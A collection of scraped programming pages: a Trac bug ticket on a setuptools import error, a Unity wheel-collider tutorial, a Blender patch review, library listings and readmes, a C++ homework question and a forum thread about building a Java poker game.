    import posixpath as path
ImportError: No module named posixpath

Attachments (0) Change History (9) comment:1 Changed 10 years ago by comment:2 follow-up: 6 Changed 10 years ago by I don't think this issue is related to your installation. I get the same error, and posixpath.py does exist, and exists at the expected place (/usr/lib/python2.4/posixpath.py on my machine). The trouble seems to come from a conflict with setuptools. I'm not able to understand the exact issue, but AFAICT: when XmlRpcPlugin imports resource_filename from the pkg_resources.py file of setuptools, the Python interpreter fails to import standard modules. Again, I don't understand the exact issue, but I got rid of this error when I moved the from pkg_resources import resource_filename statement from the get_templates() method up to the top of the file, along with the other import directives.
- I'm not sure this is the right way to do it; this is probably more of a workaround.
- I really wish a Python expert could explain why this collision - or whatever it is - occurs.

Note that this occurs with setuptools 0.6c3 and 0.7a1 - at least. This error is not really about posixpath: if you disable the related code, Trac will fail on other system modules that are imported by setuptools right after the os.py import. I think this error can also occur with other plugins (not only XmlRpcPlugin), which is why I'm reopening this ticket on t.e.o. rather than filing a bug on TracHacks. The code used in XmlRpcPlugin is pretty standard code that has been duplicated in most of the plugins that rely on templates. I don't know why the error does not occur in the other plugins though. Removing the import posixpath directive from the wiki.py XmlRpcPlugin file does not help. comment:3 follow-up: 4 Changed 10 years ago by After reading eblot's comment, I think the issue still needs an explanation, even if we're not seeing it anymore in Trac. comment:4 Changed 10 years ago by comment:5 Changed 10 years ago by I just encountered this error also, after upgrading FC5→FC6 and installing the setuptools RPM (and removing the egg). The fix also works for me. comment:6 Changed 9 years ago by … I got rid of this error when I moved the from pkg_resources import resource_filename statement from the get_templates() method up to the top of the file, along with the other import directives. There also have been numerous reports of similar strange import errors for import statements made in methods rather than at the top level, for MySQLdb in the past (see #4459). More recently someone reported a similar error for rst.py concerning the docutils imports, and a similar change fixed it. At any rate, this is a tracrpc (is that the XMLRPC plugin?) issue, and should be fixed there. comment:7 Changed 9 years ago by You are not alone.
Please see After installing XML-RPC revision 2624 Trac fails with "ImportError: No module named posixpath" comment:8 Changed 9 years ago by People upgrading from 0.10.4 to 0.11.1: You may see this because you have the old XmlRpcPlugin and/or the CtxtnavAddPlugin installed. Disable (remove the enabling lines in trac.ini) and/or delete the plugin files (including the copy in the PYTHON_EGG_CACHE). Then try upgrading again. comment:9 Changed 8 years ago by BTW, this is now fixed for th:XmlRpcPlugin in th:changeset:6106. Uh. My Bad. From the traceback I see that this is not related to trac but my python installation.
https://trac.edgewall.org/ticket/4280
Unity Wheel Collider for Motor Vehicle Tutorial 2018 Entry posted by Vivek Tank · Objective The main objective of this post is to give an idea of how to work with the Wheel Collider and the physics behind it. Want to make a car racing game? Having trouble with car physics? Where to use a Wheel Collider? How to use a Wheel Collider? What are the components of a Wheel Collider? How is a Wheel Collider different from other colliders? Have these questions in your mind? No worries... You'll know everything about the Wheel Collider after reading this post. INTRODUCTION The Wheel Collider is a special kind of collider which is used for vehicles. It has a built-in collision detection technique and the physics of an actual wheel. It can be used for objects other than wheels (like bumper boats, bumper cars, etc., which use suspension forces), but it is specially designed for vehicles with wheels. Is there anything special in it which is not in other colliders? Yes, each and every collider has something special (that's why Unity created them). With this collider, you get all the components which are needed to make a vehicle drivable. Do you have any idea about the components? No problem, I will explain the components here. Before that, it's very important to understand how the Wheel Collider component works internally to get a car working in Unity. Here, I have explained everything. This is how you look at your dashing and shiny car. But Unity doesn't have good eyesight, so Unity looks at your car like this: 4 wheel colliders and 1 car collider, that's it! Now let's discover what's inside the Wheel Collider. The wheel collider doesn't have any shape; it is raycast based. Mass & Radius: the mass and radius of the wheel. (Easy, isn't it?) Below I have given a little introduction to the physics of the wheel collider. Every wheel computes its sprung mass. The sprung mass (not weight) is used to apply an individual force on each wheel. The suspension distance is the distance between max droop and max compression. This suspension is calculated based on the rest pose.
Suspension Force: F = sprungMass * g + jounce * stiffness - damper * jounceSpeed

For tire simulation, a slip-based tire friction model is used rather than a static or dynamic physic material. To learn more about the physics of the wheel collider, click here. First we need to set up the scene (don't worry, that is the easy part).

PART-1: SCENE SETUP

Step 1: Create a 3D Plane object and give it a scale of (100, 0, 100).
Step 2: Create an empty object and add a 3D Rigidbody. Name it "Car".
Step 3: Import a 3D car model into your scene (you will get the download link below) and add it as a child of Car.
Step 4: Take a Mesh Collider and add it as a child of Car; name it "CarCollider".
Step 5: Create two empty GameObjects inside Car and name them "Wheel Meshes" and "Wheel Colliders".
Step 6: Inside Wheel Meshes add 4 empty GameObjects named "FL", "FR", "RL" and "RR", and assign the wheel mesh to each (you will get the download link below). Set their positions.
Step 7: Inside Wheel Colliders add 4 empty GameObjects named "Col_FL", "Col_FR", "Col_RL" and "Col_RR". Add a Wheel Collider as a component of each. Set the radius of the colliders to match the size of the mesh, and set their positions to match the meshes.

Yep, it's done! That was actually the difficult part, setting up the scene. Now it's time for the really easy part: scripting.

PART-2: SCRIPTING (check the script reference: click here)

[System.Serializable]
public class AxleInfo {
    public WheelCollider leftWheelCollider;
    public WheelCollider rightWheelCollider;
    public GameObject leftWheelMesh;
    public GameObject rightWheelMesh;
    public bool motor;
    public bool steering;
}

In this AxleInfo class, we store the info for a pair of wheels. Now, let's go for a long drive. This script is to drive the car.
public class CarDriver : MonoBehaviour {
    public List<AxleInfo> axleInfos;
    public float maxMotorTorque;
    public float maxSteeringAngle;
    public float brakeTorque;
    public float decelerationForce;

    public void ApplyLocalPositionToVisuals (AxleInfo axleInfo) {
        Vector3 position;
        Quaternion rotation;
        axleInfo.leftWheelCollider.GetWorldPose (out position, out rotation);
        axleInfo.leftWheelMesh.transform.position = position;
        axleInfo.leftWheelMesh.transform.rotation = rotation;
        axleInfo.rightWheelCollider.GetWorldPose (out position, out rotation);
        axleInfo.rightWheelMesh.transform.position = position;
        axleInfo.rightWheelMesh.transform.rotation = rotation;
    }

    void FixedUpdate () {
        float motor = maxMotorTorque * Input.GetAxis ("Vertical");
        float steering = maxSteeringAngle * Input.GetAxis ("Horizontal");
        for (int i = 0; i < axleInfos.Count; i++) {
            if (axleInfos [i].steering) {
                Steering (axleInfos [i], steering);
            }
            if (axleInfos [i].motor) {
                Acceleration (axleInfos [i], motor);
            }
            if (Input.GetKey (KeyCode.Space)) {
                Brake (axleInfos [i]);
            }
            ApplyLocalPositionToVisuals (axleInfos [i]);
        }
    }

    private void Acceleration (AxleInfo axleInfo, float motor) {
        if (motor != 0f) {
            axleInfo.leftWheelCollider.brakeTorque = 0;
            axleInfo.rightWheelCollider.brakeTorque = 0;
            axleInfo.leftWheelCollider.motorTorque = motor;
            axleInfo.rightWheelCollider.motorTorque = motor;
        } else {
            Deceleration (axleInfo);
        }
    }

    private void Deceleration (AxleInfo axleInfo) {
        axleInfo.leftWheelCollider.brakeTorque = decelerationForce;
        axleInfo.rightWheelCollider.brakeTorque = decelerationForce;
    }

    private void Steering (AxleInfo axleInfo, float steering) {
        axleInfo.leftWheelCollider.steerAngle = steering;
        axleInfo.rightWheelCollider.steerAngle = steering;
    }

    private void Brake (AxleInfo axleInfo) {
        axleInfo.leftWheelCollider.brakeTorque = brakeTorque;
        axleInfo.rightWheelCollider.brakeTorque = brakeTorque;
    }
}

I know this script was a little bit difficult, but I am here to help you.
ApplyLocalPositionToVisuals(AxleInfo axleInfo)
- This method takes one argument: axleInfo.
- It is used to apply the position and rotation of the wheel colliders to the wheel meshes.

FixedUpdate()
- Set the size of the axleInfos list to 2.
- Now add your colliders and meshes to the appropriate slots.
- We have 3 methods to control the car: Acceleration(), Steering() and Brake(). These methods work like the controls of the vehicles we drive in reality: accelerator, steering and brake (no clutch here).

Acceleration()
- It is used to make the vehicle move forward and backward.
- If the forward or backward buttons are not pressed, then we need to call Deceleration().
- motorTorque is used to add torque (in the forward or backward direction) to a wheel.
- When the vehicle is moving, brakeTorque needs to be set to 0.

Deceleration()
- It is used to slow the vehicle down when the forward and backward buttons are not pressed.

Steering()
- It is used to turn the vehicle.
- steerAngle is used to change the steering angle of the wheel.

Brake()
- It is used to stop the vehicle using the brakeTorque property.

PART-3: ASSIGNING VALUES

Finally, this is the last thing to do to make your car drivable. Enable Motor if you want to apply motor torque and suspension force to that wheel. Enable Steering if you want that wheel to steer. Maximum Motor Torque should be changed according to your car's Rigidbody mass. Maximum Steering Angle should be between 30 and 35 degrees. Brake Torque depends on how much braking force you want to apply. Deceleration Force must be less than Brake Torque.

Tip - Experiment with these values to make your car run smoothly.

Caution - The Brake Torque and Deceleration Force values usually need to be much higher to actually stop the car (1e+5 to 1e+8).
https://www.gamedev.net/blogs/entry/2265131-unity-wheel-collider-for-motor-vehicle-tutorial-2018/
I think i got rid of it with 1.6.0_17. Wondering!!! Type: Posts; User: glidealong I think i got rid of it with 1.6.0_17. Wondering!!! Thanks, i couldnt find this with my search capabilities. I still get this issue with jdk1.6.0_03 Expecting a genuine response , rather than bashing... Steps to reproduce 1. Go to 2. Take print preview from browsers' file menu 3. You can see that only the contents that fit in the first... Anyone from gxt team can confirm if this is possible, i need to commit some feature with my product manager. Please respond. Thanks and Regards, Hafiz May i know when will this fix be released? Thanks and Best Regards, Hafiz Occasionally while dragging and dropping portlets inside a portal provides wrong information for getColumn(), getRow(), getStartColumn(), getStartRow() information. This is causing quite a lot of... Is it possible to enable drag and drop for tab item inside a tab panel, so that i can rearrange the order of the tab items by simply dragging and dropping the items inside the tabpanel? Thanks and... Yes, i have my deliverable planned for release this month. All you need to do is insert the iframe html into one the div inside the portlet. And make sure you port all javascript code in the... Oops, my bad, sorry for the mistake. Thanks and Regards, hafiz This is basically the same issue as reported in I am having the same issue with 2.0.1 version. Basically, if you have 2 groups of radio buttons,... I am using 2.0.1 and facing the same issue, is the fix available in this version. Please let me know? Thanks and Regards, Hafiz I am faced with something similar, where we want to style various message boxes differently depending on the type of error. It requires me to add styles to the messagebox for my css developers to... private Listener<PortalEvent> portletDragnDropListener = new Listener<PortalEvent>() { public void handleEvent(PortalEvent be) { (... It is possible, i have achieved it. 
You need to make the application you are developing an opensocial container. Please refer to... Yes , i could solve the issue by making use of YUI menu. I overriden the tabpanel constructor with public class CustomTabPanel extends TabPanel { Ask for it and you get it I just found the answer, it is in PortalEvent and not to be looked in portlet. I need to store the state of a portal into the database. For this i need to identify an event that is fired when a portlet is dragged and dropped into a new position and i need to extract the... Yep 1+ Why can't header item be a container? Thanks and Regards, Hafiz I have been thinking on how to implement a event bubbling metaphor in gxt as i felt it was one of the important factors needed in developing an event driven application. Any user interaction in... Hi there, We are looking into making GXT portal compatible with open social standards so that we can seamlessly integrate the various gadgets available at igoogle and to develop our gadgets which... I am developing a portal which requires me to embed google gadgetsas an igoogle portlet (the way it is seen in igoogle) with all the settings and other options as it is. It means I would like to add... I am actually building a custom menu by using toolbar and buttons, i need to listen to events fired by the composited buttons at my 'custom menu' instance. Thanks for the response. Best... To my dismay i just found that extgwt components doesn't bubble the events up the DOM. But if you use a GWT component the events are bubbling up the DOM hierarchy. I just tested with extgwt button...
https://www.sencha.com/forum/search.php?s=72ecd22719fce668dcd59304e10f10f1&searchid=20487736
Up until now, materials only had access to constants stored in the material itself, or attributes associated with the mesh vertices. However, in certain cases it is convenient to provide parameters associated with individual objects that use that material. This patch addresses that use case by adding two connected features to the Attribute node. A new 'Alpha' output socket is added to the Attribute node, which returns the fourth channel of the attribute if available. Currently there already is a four channel attribute (vertex color), but the alpha channel is only accessible through the dedicated Vertex Color node. This extends the generic attribute node to handle that case. If the attribute has fewer than 4 channels, the 'alpha' value is not well specified, but generally seems to be 1. As the main feature, a new dropdown allows switching the node from accessing Geometry attributes to the Object or Instance mode. In those modes the attribute name is interpreted as the name of a custom property, or a generic RNA path like the one produced by Copy Data Path. The Object mode searches for the property in the object and its data ID in that order. The Instance mode additionally looks first in the particle system settings and the instance parent object if the current object was instanced. This feature supports properties that are integer, float, or a float array of up to 4 components. The values are appropriately padded to have 4 channels, and the alpha channel is guaranteed to default to 1 if the property exists, or 0 if it was not found. The primary reason for introducing the Geometry/Object/Instance dropdown is that without a way to distingush varying and uniform attributes when the material is compiled it would be very difficult to implement this for Eevee. Eevee is also limited to only 8 such attributes per material because of hardware limitations on UBO size. 
Cycles seems to be designed with a common namespace for all attributes in mind, so the cycles-blender interface translates attribute types by internally adding a name prefix. The code is available as individual commits at: Test file (updated): Now I understand the DRW part better. I don't have any issue with the implementation details. It's mostly code style issues / lack of documentation. After theses are fixed, it's a greenlight for me. Why not use a BLI_bitmap? I think this code is better suited to be put inside draw_instance_data.c, which already does something similar. It's a DRW structure. Use DRW prefix. Also Same thing as the GPU struct, could abreviate to DRWUniformAttrBuf (naming style of the GPU module). This really lack some comment on the data structure. Please add some comment about the whole struct and each members. Why is the next pointer at the end of the struct? Is this a linklist? Ok I just saw this is used only when deleting the buffers. Then put it in a comment or/and rename the pointer next_orphan. I don't like having this type here. Maybe just use BLI_math_vector.h functions with a float[4] for readability and code consistency. I'm starting to think the name is a bit too verbose but that's a bit personal as I tend to like shorter names. The fact we have GPUMaterialTexture is to avoid mixing with the GPUTexture. I would prefer GPUUniformAttr or at least GPUMaterialUniformAttr (attr is ubiquitous in the codebase). Same for GPUMaterialUniformAttributeSet which could be rename to GPUUniformAttrList. use plural and specify it contains ubos. The container type can be viewed in other ways. It's not obvious that this function can return NULL. Add a comment on top of it's declaration. Add a comment that says that this is the case when there is not enough GPU slots. Nitpick: Isn't Attribs supposed to be at max a vec4? Overallocating is safer than underallocating ;) Updated as requested. I won't be able to review it properly in the next two weeks. 
So I'm tagging @Jeroen Bakker (jbakker) as reviewer instead of me to avoid stalling the review. In EEVEE, when using a float property the data is sent to the GPU as (prop_value, prop_value, prop_value, 1). When read in the node_attribute it is averaged, so it will be (prop_value * 3.0 + 1.0) / 4.0, which isn't what the user expects. Might be related to the change of how Alpha values are handled. Fixed attribute float output. If there is a big performance impact, refactoring the code so that there are no separate primitive_attribute functions per data type may help. I think this should default to all zero. For 3-channel colors it can set alpha to 1, but I would not do this for arbitrary 4D float arrays. This can be wrapped in an AttributeRequestSet requests = object->needed_attributes() function, next to the need_attribute function. We may need to add additional logic here besides just looping over shaders, and I want to keep that abstracted away like it is for need_attribute. Rather than a prefix for the name, there should be an additional field in AttributeRequest. I don't really see a reason to use special prefixes here. Overriding should be the other way around; that's how it works in other renderers and 3D software that I'm aware of, and so will be better for interop. For example a per curve point radius on hair should override a radius per curve, which should override a radius for the entire object. Can you add a comment explaining the chain link thing? Index into what? This needs a better name/description. This should be a protected member, not mixed with the public members. This seems like something that can be committed already if it's required. I'd rename this to "Instancer", for consistency with the "From Instancer" option in the texture coordinate node. "Instance" implies to me some different value per instance, not a shared value for all objects instanced by an instancer.
caused the instancing -> instanced it I completely disagree - defaulting the alpha to 1 for existing attributes, and 0 for missing ones allows detecting if the property was found. Also, for all varying attributes alpha already defaults to 1, and has to be that way due to how it works in eevee, which apparently has basis in OpenGL itself. The reason for prefixes is that the uniform attributes form a completely separate namespace in Blender with a dropdown in the node (required by Eevee), but Cycles already has all attributes in a single namespace looked up only by name. This information must be part of the attribute key, i.e. attribute "foo" with types Geometry, Object and Instance are all separate attributes, which can be used simultaneously by the same material shader. This would be impossible to achieve in the SVM case without either completely duplicating the mesh attribute maps, scanning through the whole list until the end, or introducing a separate attribute map index for objects instead of linking. The way I implemented is that object maps only contain object attributes, and then link to the mesh maps. It's simple: to avoid duplicating the mesh maps for each objects with object attributes, maps now can link to other maps like a linked list, so object maps only have object attributes, and then link to the mesh map. Since this is your code originally, if you have a better implementation idea I'd gladly hear it. Index into mesh vector? It's used to access the temporary attribute data arrays by index when all you have is a mesh pointer. This makes sense since all other allocation functions for bitmap use calloc, and the DRWSparseUniformBuffer added in this patch depends on this. Updated to address feedback. Fixed a few missed places that should now use NODE_ATTR_OUTPUT_FLOAT3 (broke all tests) In D2057#221139, @Brecht Van Lommel (brecht) wrote:? Just checked with CUDA on BMW and there seems to be no discernible difference. 
Can't test OpenCL because blender says it's not supported with my gpu (maybe actually I'm missing some library package, but I have no idea). I made a branch build, so maybe somebody else can test too: I tested the test file of this diff on OpenCL and seems to be working fine. In D2057#228939, @Jeroen Bakker (jbakker) wrote: I tested the test file of this diff on OpenCL and seems to be working fine. I tested the test file of this diff on OpenCL and seems to be working fine. What about performance? I tested that there is no observable decrease in Cycles rendering speed on BMW with CUDA. Brecht raised a concern that adding more kernel code could affect things even when it's not called. Committed the Cycles internal changes to master, rebasing patch on them. From my testing there should be no performance regressions in GPU rendering. Approving the Cycles and shader UI part of this. Have not looked at the Eevee implementation. When this gets committed, be sure to add a test to the regression test files. Removing reviewers from 2016. In D2057#232150, @Brecht Van Lommel (brecht) wrote: Approving the Cycles and shader UI part of this. Have not looked at the Eevee implementation. When this gets committed, be sure to add a test to the regression test files. Question, when this gets committed, can we revert the fix for: ? In D2057#232302, @Jagannadhan Ravi (easythrees) wrote: Question, when this gets committed, can we revert the fix for:? Question, when this gets committed, can we revert the fix for:? D9322 is not related to this patch. There is another workaround in the multithreaded export related to dupli particles. For that I plan to implement a better solution using object attributes to store per-instance particle info. But it's not there yet. Fixed a race condition caused by the recent addition of threaded geometry update. @Jeroen Bakker (jbakker) @Clément Foucault (fclem) So what is the conclusion on the Eevee part of the patch? 
@Brecht Van Lommel (brecht) Created a quite thorough test file, will commit when the patch is in. Does the used_shaders race condition fix look OK? All the outstanding issues have been addressed for the EEVEE/viewport part, and I have approved the patch.
https://developer.blender.org/D2057?id=28548
mercurial is a distributed source control management tool. Hg::Lib is an interface to its command server. THIS CODE IS ALPHA QUALITY. This code is incomplete. Interfaces may change....
DJERIUS/Hg-Lib-0.01 - 05 Feb 2013 04:14:55 GMT

When you execute a script found in, for example, "gist", you'll be annoyed at missing libraries and will install those libraries by hand with a CPAN client. We have repeated such a task, which violates the great virtue of Laziness. Stop doing it, mak...
GFUJI/lib-xi-1.03 - 25 Jan 2014 02:46:02 GMT

MONS/ex-lib-0.90 - 21 Jul 2009 15:58:05 GMT

A Fry::Lib object has the following attributes: Attributes with a '*' next to them are always defined. *id($): Unique id which is full name of module. *vars(\@): Contains ids of variables in its library. *opts(\@): Contains ids of options in its libr...
BOZO/Fry-Shell-0.15 - 12 Jan 2005 17:34:38 GMT

PSHANGOV/lib-ini-0.002 - 14 Sep 2012 11:32:37 GMT

Sub::Lib allows you to store sub-routines into a common library which can then be passed around as a variable. It's a run-time namespace....
PRAVUS/Sub-Lib-0.03 - 04 Apr 2017 14:07:07 GMT

The
ALEXBYK/Evo-0.0405 - 18 Jul 2017 22:54:34 GMT

Searches upward from the calling module for a directory t with a lib directory inside it, and adds it to the module search path. Looks upward up to 5 directories. This is intended to be used in test modules either directly in t or in a subdirectory t...
HAARG/Test-Lib-0.002 - 16 Aug 2014 01:04:57

This module globs the given paths and adds them to @INC. Several path patterns can be passed in a single call separated by colons (or by semicolons on Windows)....
SALVA/lib-glob-0.02 - 02 Sep 2009 17:06:14 GMT

GRIAN/lib-deep-0.93 - 16 Apr 2014 19:47:56 GMT

GOMOR/Lib-Furl-1.00 - 01 Nov 2012 17:08:27 GMT

Given a list of module names, it will make subsequent loading of those modules a no-op. It works by installing a require hook in @INC that looks for the specified modules to be no-op'ed and return "1;" as the source code for those modules. This makes...
PERLANCAR/lib-noop-0.002 - 27 Dec 2016 11:31:08 GMT

This is the package that interfaces to GIMP via the libgimp interface, i.e. the normal interface to use with GIMP. You don't normally use this module directly, see Gimp....
ETJ/Gimp-2.32 - 08 May 2016 14:43:08 GMT

The - 17 Sep 2011 22:39:34 GMT

This pragma is used to test a script under a condition of empty @INC, for example: fatpacked script....
SHARYANTO/lib-none-0.02 - 12 Apr 2014 14:58:52 GMT

This pragma is a shortcut for lib::filter. This: use lib::allow qw(Foo Bar::Baz Qux); is equivalent to: use lib::filter allow_core=>0, allow_noncore=>0, allow=>'Foo;Bar::Baz;Qux';...
PERLANCAR/lib-filter-0.27 - 24 Aug 2016 02:36:39 GMT

This GMT
https://metacpan.org/search?q=module%3Alib
#include <CbcBranchCut.hpp> Inheritance diagram for CbcCutBranchingObject: This object can specify a two-way branch in terms of two cuts. Definition at line 108 of file CbcBranchCut.hpp. Default constructor. Create a cut branching object. The down cut will be applied on way==-1, the up cut on way==1. Down is assumed to come first, so way_ is set to -1. Copy constructor. Destructor. Assignment operator. Clone. Implements CbcBranchingObject. Sets the bounds for variables or adds a cut depending on the current arm of the branch and advances the object state to the next arm. Returns the change in guessed objective on the next branch. Implements CbcBranchingObject. Print something about the branch - only if log level is high. Return true if the branch should fix variables. Reimplemented from OsiBranchingObject. Return the type (an integer identifier) of this. Implements CbcBranchingObject. Definition at line 159 of file CbcBranchCut. Cut for the down arm (way_ = -1). Definition at line 183 of file CbcBranchCut.hpp. Cut for the up arm (way_ = 1). Definition at line 185 of file CbcBranchCut.hpp. True if one way can fix variables. Definition at line 187 of file CbcBranchCut.hpp.
http://www.coin-or.org/Doxygen/CoinAll/class_cbc_cut_branching_object.html
Hello, I am currently working on a program that is supposed to do the following: I am supposed to take a data file of 5 student names that are in the following form: lastName firstName middleName. I am supposed to convert each name to the following form: firstName middleName lastName. The program must read each student's entire name into a variable and must consist of a function that takes as input a string consisting of a student's name, and returns the string consisting of the altered name. Use the string function FIND to find the index of the comma; the function LENGTH to find the length of the string; and the function SUBSTR to extract the firstName, middleName, and lastName. Here is my data file being used:

Miller, Jason Brian
Blair, Lisa Maria
Gupta, Anil Kumar
Arora, Sumit Sahil
Saleh, Rhonda Beth

Here is my program so far. I am not sure if I am on the right track or not.

#include <iostream>
#include <string>
#include <fstream>
#include <cassert>
#include <cfloat>
using namespace std;

int main()
{
    ifstream fin;
    fin.open(inputstudent.data());
    assert(fin.is_open());
    int count = 0;
    double reading, sum = 0.0;
    for (;;)
    {
        fin >> reading;
        if (fin.eof()) break;
        count++;
    }
    fin.close();
    string outputname;
    getline(cin, outputname);
    ofstream fout(outputname.data());
    assert(fout.is_open());
    fout.close();

    void reverseName(char inName[], char outName[])
    {
        char firstname[40];
        char lastname[40];
        char last[40];
        char first[40];
        strcpy(firstname, last);
        strcpy(lastname, first);
        strcpy(firstname, lastname);
        strcat(lastname, last);
        strcat(firstname, first);
    }
https://www.daniweb.com/programming/software-development/threads/322183/help-to-sort-and-arrange-names-with-c
CC-MAIN-2021-25
refinedweb
248
62.27
ParticleWebLog (community library) Summary Sends logs to the Particle servers via publish. This provides remote logging with a very tiny memory footprint. Logs can be viewed in the Particle console, or the Particle webhook feature can be used to send those log messages to the logging service of your choice (such as loggly.com). Library Read Me This content is provided by the library maintainer and has not been validated or approved. ParticleWebLog A Particle library for remote logging via publish(). An example config for loggly.com is included. I wrote this tiny logging framework because I wanted something that would allow remote logging but use very little FLASH space. Other benefits: - Messages are not sent in cleartext (they are inside the Particle encrypted link). - Because this library doesn't use UDP, it is probably more resistant to carrier throttling on cellphone networks (e.g. for the Electron). Usage #include "ParticleWebLog.h" ParticleWebLog particleWebLog; void setup() { Log.info("Hi I'm a log message"); } void loop() { } See the examples folder for more details. Documentation This library merely registers a log provider that publishes each logged string as a Particle publish event. The events will be published using the name of your choice (defaults to "log"). Limitations: - This tiny library is built on top of Particle.publish, so you should not publish log messages too quickly if you are using it. It might drop messages if you send more than about one per second. - Third-generation Particle devices emit lots of system log messages, some of which seem to come out before publishing is legal. So this log provider only logs "app" messages. Using web logging services One of the great things about this approach is that the Particle.io web service has good webhook support. So you can squirt these crude log messages to a nice storage/viewer service. Most any service that has a way to accept HTTP posts of log messages should work. 
Here is an example using loggly.com: - Go to loggly.com and create a free account (you can pick any domain name). - Go to the console for your domain and set up an HTTPS log source. It will give you an HTTPS endpoint URL. - Go to the Particle.io web console and click on "Integrations / New Integration / Webhook". - On the form it shows, enter "log" for Event Name, enter the URL you were provided above, and change the request format to JSON. - Then click to enter custom JSON data and paste in the following: { "message": "", "from": "", "published_at": "", "userid": "", "fw_version": "" } - Click "save" to save your new integration. - In the top right of the integration you should now see a "Test" button. You can click it to test that the Particle server is now able to talk with Loggly. - Any new log publishes from your device should now be stored in Loggly. Contributing I will happily accept pull requests and respond to issues raised in github. Thanks to @barakewi for his Papertrail library, which was used as a template to create this library. LICENSE Licensed under the
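To make the webhook step concrete, here is a Python sketch of the kind of JSON body the integration delivers. The field values are hypothetical stand-ins; in the real integration the Particle console substitutes its own template variables into the custom JSON before posting.

```python
import json

# Hypothetical sample values; Particle fills these in from the published event.
payload = {
    "message": "INFO: Hi I'm a log message",
    "from": "my-electron",
    "published_at": "2021-05-01T12:00:00Z",
    "userid": "user-1234",
    "fw_version": "7",
}

body = json.dumps(payload)
# `body` is roughly what a service such as Loggly receives as the POST body.
```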
https://docs.particle.io/cards/libraries/p/ParticleWebLog/
CC-MAIN-2021-21
refinedweb
512
66.23
» Game Development Author Poker Johannes Thorén Ranch Hand Joined: Nov 18, 2008 Posts: 64 posted Nov 18, 2008 12:35:00 0 Hello everyone, I'm new here and I'm also new to the magic world of Java. I just started my Java class in school and I got the assignment to make a poker game in Java and to put it on a website. I figured that I should make a 'simple' 5-card "casino" poker client, since it probably would be the easiest thing to make. But now I realize that it isn't as easy as I thought. Could anyone help me get my head straight about how I should build it? If anyone knows any good tutorials or wants to talk Java over MSN or so, give me a PM if you can! Thanks Gregg Bolinger GenRocket Founder Ranch Hand Joined: Jul 11, 2001 Posts: 15300 6 I like... posted Nov 18, 2008 12:47:00 0 When you say "put it on a website", do you mean you are supposed to make an applet using the Swing API, or a web application using JSP/Servlet (JEE spec)? GenRocket - Experts at Building Test Data Paul Yule Ranch Hand Joined: May 12, 2008 Posts: 229 posted Nov 18, 2008 13:31:00 0 Are you having trouble with the basics of how to design the poker architecture/logic, or trouble with understanding how to get your finished product "out there"? Johannes Thorén Ranch Hand Joined: Nov 18, 2008 Posts: 64 posted Nov 19, 2008 02:35:00 0 Right now I haven't started programming at all. I don't know if I should use the Swing API or JEE; I bought a book that's called "Java with Swing". Right now I don't know how to do anything; I've just programmed some basic field things. I just know that I got the mission to make a poker client, register a domain, and put the poker client on the domain so everyone could play it. Right now this seems kind of impossible. This seems like a good forum; 2 responses in a day ain't too bad. Kind Regards, Johannes Gregg Bolinger GenRocket Founder Ranch Hand Joined: Jul 11, 2001 Posts: 15300 6 I like... 
posted Nov 19, 2008 08:50:00 0 Johannes, I'd be surprised if an instructor is really that vague about requirements for a project. There is a monumental difference between creating a Swing application and a web application. To go through the trouble for one, be successful, but be wrong because your instructor meant something else would be horrible. I also find it odd that an assignment like this is your first one. Is this maybe your final project assignment, and the instructor has given it to you early to work on for the duration of the class? If that is the case, you'll need to approach it differently, because you will learn things in class as you go along that will help with this project. I'd suggest finding out which direction you are supposed to go and then let us know. Johannes Thorén Ranch Hand Joined: Nov 18, 2008 Posts: 64 posted Nov 19, 2008 09:44:00 0 It's a course we have here in Sweden called Projectwork, and I decided to have programming as my major. I programmed ActionScript 2.0 for 3 months until last week, when I started with Java; we're going to work with Java until June. My poker game needs to be done in March. I could do a game in ActionScript, since there I can just insert photos of cards and name them. I don't know how to do that in Java. In Java I also need to make the graphics. Does anyone know some good site where there are some poker tutorials? Or graphics tutorials: how to attach photos to the program and such. I guess I need to make an array for card colour, 0-3, and one for value, 0-13, and then make it pick one random colour and one random value, and then if it's like 0, 0 it should load the picture Ace of Hearts. vanlalhmangaiha khiangte Ranch Hand Joined: Sep 11, 2006 Posts: 170 posted Nov 20, 2008 02:49:00 0 Hi, are all the players going to be AI, or are they all human players? I think more important than the graphics right now is the logic. Finalise what variation of poker you want. Saw this site: poker in applets. Graphics are nice .. 
I think they use this in Facebook ... Casual googling led me here: a web-based poker game. Really interesting project .. I love the game of poker .. Needs lots of thinking Gavin Tranter Ranch Hand Joined: Jan 01, 2007 Posts: 333 posted Nov 24, 2008 06:05:00 0 I wouldn't use an array for the cards. I would (and did, until I got bored) use a couple of enums, with an ArrayList rather than an array. It strikes me as a rather large project for a 3-month course, and registering a domain is a little strange and adds extra cost; what's wrong with the institute's servers? When we did web projects we hosted them on our account on the uni servers. The thing I found hardest was the logic of poker: (in hold'em) how, from 7 cards, to decide which were the best 5 cards in a hand. So I would advise understanding the basic rules of the type of poker you decide to implement. G Johannes Thorén Ranch Hand Joined: Nov 18, 2008 Posts: 64 posted Nov 24, 2008 10:25:00 0 I think I've got the logic, but I'm not going to do hold'em, just a 5-card poker casino game. Something like this one, except that I don't want the cards to disappear; I want every hand to be dealt from a full deck of cards: (made in ActionScript 2.0) What is an enum? And what's the difference from arrays? (int test [] = new int[x]) I didn't need to get my own domain; I just felt like it would look more professional. Gavin Tranter Ranch Hand Joined: Jan 01, 2007 Posts: 333 posted Nov 26, 2008 03:17:00 0 Basically, and this is not the best description ever, but an enum is a class that allows you to enumerate constants. So if you had the days of the week: Monday, Tuesday, etc., you might choose to hold them in an array as Strings, or as int constants named MONDAY etc.: public class DaysOfTheWeek{ public static final int MONDAY = 1; public static final int TUESDAY = 2; .... 
public static final int SUNDAY = 7; } This has several disadvantages, such as there being no type checking: since the day of the week is just an int, you could call a method that is expecting a day of the week with any old int. ... public void doSomething(int dayOfWeek){ code that expects day of week to be an int between 1-7 } ... public void work(){ doSomething(8); } An enum is a special type of class that does pretty much the same thing but is type safe, in that any method that expects a day of the week can only accept one of the enumerated days of the week: public enum DaysOfWeek{ MONDAY,TUESDAY,WEDNESDAY,THURSDAY,FRIDAY,SATURDAY,SUNDAY } Now any method that requires a DaysOfWeek can only accept a day of the week. Enums can be used in switch statements etc. Check out the Sun documentation on enums; you might find it interesting. G
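The array-vs-enum question in the thread translates directly to Python's enum module. Java was the language under discussion, so treat this as a sketch of the same design rather than the poster's code; the deck-and-deal helpers are illustrative:

```python
from enum import Enum
from itertools import product
import random

class Suit(Enum):
    HEARTS = 0
    DIAMONDS = 1
    CLUBS = 2
    SPADES = 3

class Rank(Enum):
    ACE = 1
    TWO = 2
    THREE = 3
    FOUR = 4
    FIVE = 5
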